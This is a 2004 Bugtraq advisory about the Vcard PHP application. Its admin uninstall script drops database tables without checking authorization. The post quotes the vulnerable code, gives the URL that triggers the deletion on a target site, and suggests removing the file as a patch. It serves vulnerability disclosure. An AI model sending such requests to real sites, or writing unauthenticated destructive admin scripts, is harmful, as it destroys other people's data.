[34162] in bugtraq
Vcard 2.8 uninstall script problem
daemon@ATHENA.MIT.EDU (saudi linux)
Wed Mar 17 21:09:05 2004
Date: 17 Mar 2004 22:21:38 -0000
Message-ID: <20040317222138.13812.qmail@search.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: saudi linux <ksa2ksa@yahoo.com>
To: bugtraq@securityfocus.com
Informations :
°°°°°°°°°°°°°°
Procduct: Vcard
Version : 2.9 may other VER
Problems : File uninstall & delete the table
PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
/admin/uninstall.php :
------------------------------------------------------------------------
[...]
<?
$step = $HTTP_GET_VARS['step'];
if (empty($step))
{
echo "<p><b>Are you sure, uninstall vCard database tables and them contents?</b></p>";
echo "<p>Yes, I'm sure. <a href='$PHP_SELF?step=2'>Click here to continue --></a></p>";
}
if ($step == 2)
{
include "./config.inc.php";
include("./db_mysql.inc.php");
include("./functions.inc.php");
$DB_site = new DB_Sql_vc;
$DB_site->server = $hostname;
$DB_site->user = $dbUser;
$DB_site->password = $dbPass;
$DB_site->database = $dbName;
$DB_site->connect();
$dbPass = "";
$DB_site->password = "";
//*********************************************
$DB_site->query("DROP TABLE IF EXISTS vcard_abook ");
$DB_site->query("DROP TABLE IF EXISTS vcard_account ");
?>
As u can see the script does not Check User Authorization
Exploit:
°°°°°°°°°°
http://[target]/[Vcard folder]/admin/uninstall.php
or
http://[target]/[Vcard folder]/admin/uninstall.php?step=2
patch:
°°°°°°°°°°
remove uninstall.php and protect admin folder by .htaccess
Saudi Linux
KSA o0 KSA 0o
